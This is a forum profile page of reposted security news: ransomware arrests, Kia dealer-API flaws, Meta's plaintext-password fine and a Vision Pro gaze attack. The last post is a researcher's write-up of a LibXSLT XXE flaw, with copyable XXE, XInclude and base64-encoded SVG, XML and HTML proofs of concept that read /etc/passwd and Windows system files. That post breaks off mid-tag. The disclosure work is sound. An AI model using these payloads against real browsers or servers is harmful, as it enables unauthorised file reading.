Jump to content

akkiliON

Active Members
  • Posts

    1204
  • Joined

  • Last visited

  • Days Won

    62

akkiliON last won the day on December 4

akkiliON had the most liked content!

6 Followers

About akkiliON

  • Birthday 01/01/1970

Recent Profile Visitors

15678 profile views

akkiliON's Achievements

Collaborator

Collaborator (7/14)

  • Reacting Well Rare
  • First Post Rare
  • Collaborator Rare
  • Posting Machine Rare
  • Very Popular Rare

Recent Badges

686

Reputation

  1. A Russian cybercriminal wanted in the U.S. in connection with LockBit and Hive ransomware operations has been arrested by law enforcement authorities in the country. According to a news report from Russian media outlet RIA Novosti, Mikhail Pavlovich Matveev has been accused of developing a malicious program designed to encrypt files and seek ransom in return for a decryption key. "At present, the investigator has collected sufficient evidence, the criminal case with the indictment signed by the prosecutor has been sent to the Central District Court of the city of Kaliningrad for consideration on the merits," the Russian Ministry of Internal Affairs said in a statement. Matveev has been charged under Part 1 of Article 273 of the Criminal Code of the Russian Federation, which relates to the creation, use, and distribution of computer programs that can cause "destruction, blocking, modification or copying of computer information." He was previously charged and indicted by the U.S. government in May 2023 for launching ransomware attacks against "thousands of victims" in the country and across the world. He is also known by various online aliases Wazawaka, m1x, Boriselcin, Uhodiransomwar, and Orange. Matveev has also gone public about his criminal activities, stating that "his illicit activities will be tolerated by local authorities provided that he remains loyal to Russia." He was sanctioned by the U.S. Treasury and has been the subject of a reward of up to $10 million for any information that could lead to his arrest or conviction. A subsequent report from Swiss cybersecurity firm PRODAFT revealed that Matveev has been leading a team of six penetration testers to carry out the ransomware attacks. Besides working as an affiliate for Conti, LockBit, Hive, Trigona, and NoEscape ransomware groups, he is said to have had a management-level role with the Babuk ransomware group up until early 2022. Furthermore, he is believed to have deeper ties with the Russian cybercrime group known as Evil Corp. The development comes a little over a month after four members of the now-defunct REvil ransomware operation were sentenced to several years in prison in Russia after they were convicted of hacking and money laundering charges. Update# A security research community that goes by the alias "club1337" said in a post on X that they received confirmation from Matveev that he had been charged in Russia, and that he had paid two fines and forfeited a chunk of the cryptocurrency earned. "He is currently out on bail, unharmed, and awaiting the next steps in the legal process," the researcher said. In a related law enforcement action, Stanislav Moiseyev, the founder of the now-defunct Hydra darknet marketplace, has been sentenced to life in prison. He has also been ordered to pay a fine of 4 million rubles. The recent wave of arrests and prosecution of Russian cybercriminals are an unusual departure from the norm, as it's uncommon for the Kremlin to prosecute its own hackers as long as they stay out of targeting companies and individuals located within its borders. Source: https://thehackernews.com/2024/11/wanted-russian-cybercriminal-linked-to.html
      • 3
      • Upvote
  2. Voi nu înțelegeți, el nu-i de aici... îl caută si pe frate-su, frate-su fiind cel din video:
  3. A new wave of international law enforcement actions has led to four arrests and the takedown of nine servers linked to the LockBit (aka Bitwise Spider) ransomware operation, marking the latest salvo against what was once a prolific financially motivated group. This includes the arrest of a suspected LockBit developer in France while on holiday outside of Russia, two individuals in the U.K. who allegedly supported an affiliate, and an administrator of a bulletproof hosting service in Spain used by the ransomware group, Europol said in a statement. In conjunction, authorities outed a Russian national named Aleksandr Ryzhenkov (aka Beverley, Corbyn_Dallas, G, Guester, and Kotosel) as one of the high-ranking members of the Evil Corp cybercrime group, while simultaneously painting him as a LockBit affiliate. Sanctions have also been announced against seven individuals and two entities linked to the e-crime gang. "The United States, in close coordination with our allies and partners, including through the Counter Ransomware Initiative, will continue to expose and disrupt the criminal networks that seek personal profit from the pain and suffering of their victims," said Acting Under Secretary of the Treasury for Terrorism and Financial Intelligence, Bradley T. Smith. The development, part of a collaborative exercise dubbed Operation Cronos, comes nearly eight months after LockBit's online infrastructure was seized. It also follows sanctions levied against Dmitry Yuryevich Khoroshev, who was revealed to be the administrator and individual behind the "LockBitSupp" persona. A total of 16 individuals who were part of Evil Corp have been sanctioned by the U.K. Also tracked as Gold Drake and Indrik Spider, the infamous hacking crew has been active since 2014, targeting banks and financial institutions with the ultimate goal of stealing users' credentials and financial information in order to facilitate unauthorized fund transfers. The group, responsible for the development and distribution of the Dridex (aka Bugat) malware, has been previously observed deploying LockBit and other ransomware strains in 2022 in order to get around sanctions imposed against the group in December 2019, including key members Maksim Yakubets and Igor Turashev. Ryzhenkov has been described by the U.K. National Crime Agency (NCA) as Yakubets' right-hand man, with the U.S. Department of Justice (DoJ) accusing him of deploying BitPaymer ransomware to target victims across the country since at least June 2017. "Ryzhenkov used the affiliate name Beverley, made over 60 LockBit ransomware builds and sought to extort at least $100 million from victims in ransom demands," officials said. "Ryzhenkov additionally has been linked to the alias mx1r and associated with UNC2165 (an evolution of Evil Corp affiliated actors)." Additionally, Ryzhenkov's brother Sergey Ryzhenkov, who is believed to use the online alias Epoch, has been linked to BitPaymer, per cybersecurity firm Crowdstrike, which assisted the NCA in the effort. "Throughout 2024, Indrik Spider gained initial access to multiple entities through the Fake Browser Update (FBU) malware-distribution service," it noted. "The adversary was last seen deploying LockBit during an incident that occurred during Q2 2024." Notable among the individuals subjected to sanctions are Yakubets' father, Viktor Yakubets, and his father-in-law, Eduard Benderskiy, a former high-ranking FSB official, underscoring the deep connection between Russian cybercrime groups and the Kremlin. "The group were in a privileged position, with some members having close links to the Russian state," the NCA said. "Benderskiy was a key enabler of their relationship with the Russian Intelligence Services who, prior to 2019, tasked Evil Corp to conduct cyber attacks and espionage operations against NATO allies." "After the U.S. sanctions and indictments in December 2019, Benderskiy used his extensive influence with the Russian state to protect the group, both by providing senior members with security and by ensuring they were not pursued by Russian internal authorities." Source: https://thehackernews.com/2024/10/lockbit-ransomware-and-evil-corp.html
      • 1
      • Upvote
  4. Cybersecurity researchers have disclosed a set of now patched vulnerabilities in Kia vehicles that, if successfully exploited, could have allowed remote control over key functions simply by using only a license plate. "These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless of whether it had an active Kia Connect subscription," security researchers Neiko Rivera, Sam Curry, Justin Rhinehart, and Ian Carroll said. The issues impact almost all vehicles made after 2013, even letting attackers covertly gain access to sensitive information including the victim's name, phone number, email address, and physical address. Essentially, this could then be abused by the adversary to add themselves as an "invisible" second user on the car without the owner's knowledge. The crux of the research is that the issues exploit the Kia dealership infrastructure ("kiaconnect.kdealer[.]com") used for vehicle activations to register for a fake account via an HTTP request and then generate access tokens. The token is subsequently used in conjunction with another HTTP request to a dealer APIGW endpoint and the vehicle identification number (VIN) of a car to obtain the vehicle owner's name, phone number, and email address. What's more, the researchers found that it's possible to gain access to a victim's vehicle by as trivially as issuing four HTTP requests, and ultimately executing internet-to-vehicle commands - Generate the dealer token and retrieve the "token" header from the HTTP response using the aforementioned method Fetch victim's email address and phone number Modify owner's previous access using leaked email address and VIN number to add the attacker as the primary account holder Add attacker to victim vehicle by adding an email address under their control as the primary owner of the vehicle, thereby allowing for running arbitrary commands "From the victim's side, there was no notification that their vehicle had been accessed nor their access permissions modified," the researchers pointed out. "An attacker could resolve someone's license plate, enter their VIN through the API, then track them passively and send active commands like unlock, start, or honk." In a hypothetical attack scenario, a bad actor could enter the license plate of a Kia vehicle in a custom dashboard, retrieve the victim's information, and then execute commands on the vehicle after around 30 seconds. Following responsible disclosure in June 2024, the flaws were addressed by Kia as of August 14, 2024. There is no evidence that these vulnerabilities were ever exploited in the wild. "Cars will continue to have vulnerabilities, because in the same way that Meta could introduce a code change which would allow someone to take over your Facebook account, car manufacturers could do the same for your vehicle," the researchers said. Source: https://thehackernews.com/2024/09/hackers-could-have-remotely-controlled.html
  5. The Irish Data Protection Commission (DPC) has fined Meta €91 million ($101.56 million) as part of a probe into a security lapse in March 2019, when the company disclosed that it had mistakenly stored users' passwords in plaintext in its systems. The investigation, launched by the DPC the next month, found that the social media giant violated four different articles under the European Union's General Data Protection Regulation (GDPR). To that end, the DPC faulted Meta for failing to promptly notify the DPC of the data breach, document personal data breaches concerning the storage of user passwords in plaintext, and utilize proper technical measures to ensure the confidentiality of users' passwords. Meta originally revealed that the privacy transgression led to the exposure of a subset of users' Facebook passwords in plaintext, although it noted that there was no evidence it was improperly accessed or abused internally. According to Krebs on Security, some of these passwords date back to 2012, with a senior employee stating "some 2,000 engineers or developers made approximately nine million internal queries for data elements that contained plaintext user passwords." A month later, the company acknowledged that millions of Instagram passwords were also stored in a similar manner, and that it's notifying affected users. "It is widely accepted that user passwords should not be stored in plaintext, considering the risks of abuse that arise from persons accessing such data," Graham Doyle, deputy commissioner at the DPC, said in a press statement. "It must be borne in mind that the passwords, the subject of consideration in this case, are particularly sensitive, as they would enable access to users' social media accounts." In a statement shared with Associated Press, Meta said it took "immediate action" to fix the error, and that it "proactively flagged this issue" to the DPC. Source: https://thehackernews.com/2024/09/meta-fined-91-million-for-storing.html
  6. Details have emerged about a now-patched security flaw impacting Apple's Vision Pro mixed reality headset that, if successfully exploited, could allow malicious attackers to infer data entered on the device's virtual keyboard. The attack, dubbed GAZEploit, has been assigned the CVE identifier CVE-2024-40865. "A novel attack that can infer eye-related biometrics from the avatar image to reconstruct text entered via gaze-controlled typing," a group of academics from the University of Florida, CertiK Skyfall Team, and Texas Tech University said. "The GAZEploit attack leverages the vulnerability inherent in gaze-controlled text entry when users share a virtual avatar." Following responsible disclosure, Apple addressed the issue in visionOS 1.3 released on July 29, 2024. It described the vulnerability as impacting a component called Presence. "Inputs to the virtual keyboard may be inferred from Persona," it said in a security advisory, adding it resolved the problem by "suspending Persona when the virtual keyboard is active." In a nutshell, the researchers found that it was possible to analyze a virtual avatar's eye movements (or "gaze") to determine what the user wearing the headset was typing on the virtual keyboard, effectively compromising their privacy. As a result, a threat actor could, hypothetically, analyze virtual avatars shared via video calls, online meeting apps, or live streaming platforms and remotely perform keystroke inference. This could then be exploited to extract sensitive information such as passwords. The attack, in turn, is accomplished by means of a supervised learning model trained on Persona recordings, eye aspect ratio (EAR), and eye gaze estimation to differentiate between typing sessions and other VR-related activities (e.g., watching movies or playing games). In the subsequent step, the gaze estimation directions on the virtual keyboard are mapped to specific keys in order to determine the potential keystrokes in a manner such that it also takes into account the keyboard's location in the virtual space. "By remotely capturing and analyzing the virtual avatar video, an attacker can reconstruct the typed keys," the researchers said. "Notably, the GAZEploit attack is the first known attack in this domain that exploits leaked gaze information to remotely perform keystroke inference." Source: https://thehackernews.com/2024/09/apple-vision-pro-vulnerability-exposed.html
      • 2
      • Upvote
  7. A year ago, I wondered what a malicious page with disabled JavaScript could do. I knew that SVG, which is based on XML, and XML itself could be complex and allow file access. Is the Same Origin Policy (SOP) correctly implemented for all possible XML and SVG syntaxes? Is access through the file:// protocol properly handled? Since I was too lazy to read the documentation, I started generating examples using ChatGPT. XSL The technology I decided to test is XSL. It stands for eXtensible Stylesheet Language. It’s a specialized XML-based language that can be used within or outside of XML for modifying it or retrieving data. In Chrome, XSL is supported and the library used is LibXSLT. It’s possible to verify this by using system-property('xsl:vendor') function, as shown in the following example. system-properties.xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet href="system-properties.xsl" type="text/xsl"?> <root/> system-properties.xsl <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <p> Version: <xsl:value-of select="system-property('xsl:version')" /> <br /> Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br /> Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> </p> </xsl:template> </xsl:stylesheet> Here is the output of the system-properties.xml file, uploaded to the local web server and opened in Chrome: The LibXSLT library, first released on September 23, 1999, is both longstanding and widely used. It is a default component in Chrome, Safari, PHP, PostgreSQL, Oracle Database, Python, and numerous others applications. The first interesting XSL output from ChatGPT was a code with functionality that allows you to retrieve the location of the current document. While this is not a vulnerability, it could be useful in some scenarios. get-location.xml <?xml-stylesheet href="get-location.xsl" type="text/xsl"?> <!DOCTYPE test [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <test> <getLocation test="ent"/> </test> get-location.xsl <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" > <xsl:output method="html"/> <xsl:template match="getLocation"> <input type="text" value="{unparsed-entity-uri(@test)}" /> </xsl:template> </xsl:stylesheet> Here is what you should see after uploading this code to your web server: All the magic happens within the unparsed-entity-uri() function. This function returns the full path of the “ent” entity, which is constructed using the relative path “?”. XSL and Remote Content Almost all XML-based languages have functionality that can be used for loading or displaying remote files, similar to the functionality of the <iframe> tag in HTML. I asked ChatGPT many times about XSL’s content loading features. The examples below are what ChatGPT suggested I use, and the code was fully obtained from it. XML External Entities Since XSL is XML-based, usage of XML External Entities should be the first option. <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test>&xxe;</test> XInclude XInclude is an XML add-on that’s described in a W3C Recommendation from November 15, 2006. <?xml version="1.0"?> <test xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include href="file:///etc/passwd"/> </test> XSL‘s <xsl:import> and <xsl:include> tags These tags can be used to load files as XSL stylesheets, according to ChatGPT. <?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:include href="file:///etc/passwd"/> <xsl:import href="file:///etc/passwd"/> </xsl:stylesheet> XSL’s document() function XSL’s document() function can be used for loading files as XML documents. <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:copy-of select="document('file:///etc/passwd')"/> </xsl:template> </xsl:stylesheet> XXE Using an edited ChatGPT output, I crafted an XSL file that combined the document() function with XML External Entities in the argument’s file, utilizing the data protocol. Next, I inserted the content of the XSL file into an XML file, also using the data protocol. When I opened my XML file via an HTTP URL from my mobile phone, I was shocked to see my iOS /etc/hosts file! Later, my friend Yaroslav Babin(a.k.a. @yarbabin) confirmed the same result on Android! iOS + Safari Android + Chrome Next, I started testing offline HTML to PDF tools, and it turned out that file reading works there as well, despite their built-in restrictions. There was no chance that this wasn’t a vulnerability! Here is a photo of my Smart TV, where the file reading works as well: I compiled a table summarizing all my tests: The likely root cause of this discrepancy is the differences between sandboxes. Running Chrome on Windows or Linux with the --no-sandbox attribute allows reading arbitrary files as the current user. Other Tests I have tested some applications that use LibXSLT and don’t have sandboxes. App Result PHP Applications that allow control over XSLTProcessor::importStylesheet data can be affected. XMLSEC The document() function did not allow http(s):// and data: URLs. Oracle The document() function did not allow http(s):// and data: URLs. PostgreSQL The document() function did not allow http(s):// and data: URLs. The default PHP configuration disables parsing of external entities XML and XSL documents. However, this does not affect XML documents loaded by the document() function, and PHP allows the reading of arbitrary files using LibXSLT. According to my tests, calling libxml_set_external_entity_loader(function ($a) {}); is sufficient to prevent the attack. POCs You will find all the POCs in a ZIP archive at the end of this section. Note that these are not zero-day POCs; details on reporting to the vendor and bounty information will be also provided later. First, I created a simple HTML page with multiple <iframe> elements to test all possible file read functionalities and all possible ways to chain them: The result of opening the xxe_all_tests/test.html page in an outdated Chrome Open this page in Chrome, Safari, or Electron-like apps. It may read system files with default sandbox settings; without the sandbox, it may read arbitrary files with the current user’s rights. As you can see now, only one of the call chains leads to an XXE in Chrome, and we were very fortunate to find it. Here is my schematic of the chain for better understanding: Next, I created minified XML, SVG, and HTML POCs that you can copy directly from the article. poc.svg <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> <!DOCTYPE svg [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <svg location="ent" /> poc.xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> <!DOCTYPE test [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <test1 location="ent"/> poc.html <html> <head> <title>LibXSLT document() XXE tests</title> </head> <body> SVG<br/> <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlsZEdNdmNHRnpjM2RrSlRJeUpUTkZKVEl3SlRWRUpUTkZKVEJCSlRORGVIaGxKVE5GSlRCQkpUSTJlSGhsSlROQ0pUQkJKVE5ESlRKR2VIaGxKVE5GSnlraUx6NEtQQzlrYVhZK0Nqd3ZabTl5WldsbmJrOWlhbVZqZEQ0S1BDOXpkbWMrQ2p3dmVITnNPblJsYlhCc1lYUmxQZ284TDNoemJEcHpkSGxzWlhOb1pXVjBQZz09Ij8+CjwhRE9DVFlQRSBzdmcgWyAgCiAgICA8IUVOVElUWSBlbnQgU1lTVEVNICI/IiBOREFUQSBhYWE+ICAgCl0+CjxzdmcgbG9jYXRpb249ImVudCIgLz4="></iframe><br/> SVG WIN<br/> <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlqT2k5M2FXNWtiM2R6TDNONWMzUmxiUzVwYm1rbE1qSWxNMFVsTWpBbE5VUWxNMFVsTUVFbE0wTjRlR1VsTTBVbE1FRWxNalo0ZUdVbE0wSWxNRUVsTTBNbE1rWjRlR1VsTTBVbktTSXZQZ284TDJScGRqNEtQQzltYjNKbGFXZHVUMkpxWldOMFBnbzhMM04yWno0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0MSBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiIC8+"></iframe><br/> XML<br/> <iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluTjVjM1JsYlMxd2NtOXdaWEowZVNnbmVITnNPblpsY25OcGIyNG5LU0lnTHo0OFluSWdMejRnQ2t4dlkyRjBhVzl1T2lBOGVITnNPblpoYkhWbExXOW1JSE5sYkdWamREMGlkVzV3WVhKelpXUXRaVzUwYVhSNUxYVnlhU2hBYkc5allYUnBiMjRwSWlBdlBpQWdQR0p5THo0S1dGTk1JR1J2WTNWdFpXNTBLQ2tnV0ZoRk9pQUtQSGh6YkRwamIzQjVMVzltSUNCelpXeGxZM1E5SW1SdlkzVnRaVzUwS0Nka1lYUmhPaXdsTTBNbE0wWjRiV3dsTWpCMlpYSnphVzl1SlRORUpUSXlNUzR3SlRJeUpUSXdaVzVqYjJScGJtY2xNMFFsTWpKVlZFWXRPQ1V5TWlVelJpVXpSU1V3UVNVelF5VXlNVVJQUTFSWlVFVWxNakI0ZUdVbE1qQWxOVUlsTWpBbE0wTWxNakZGVGxSSlZGa2xNakI0ZUdVbE1qQlRXVk5VUlUwbE1qQWxNakptYVd4bE9pOHZMMlYwWXk5d1lYTnpkMlFsTWpJbE0wVWxNakFsTlVRbE0wVWxNRUVsTTBONGVHVWxNMFVsTUVFbE1qWjRlR1VsTTBJbE1FRWxNME1sTWtaNGVHVWxNMFVuS1NJdlBnbzhMMmgwYld3K0Nqd3ZlSE5zT25SbGJYQnNZWFJsUGdvOEwzaHpiRHB6ZEhsc1pYTm9aV1YwUGc9PSI/Pgo8IURPQ1RZUEUgdGVzdCBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiLz4="></iframe><br/> XML WIN<br/> <iframe 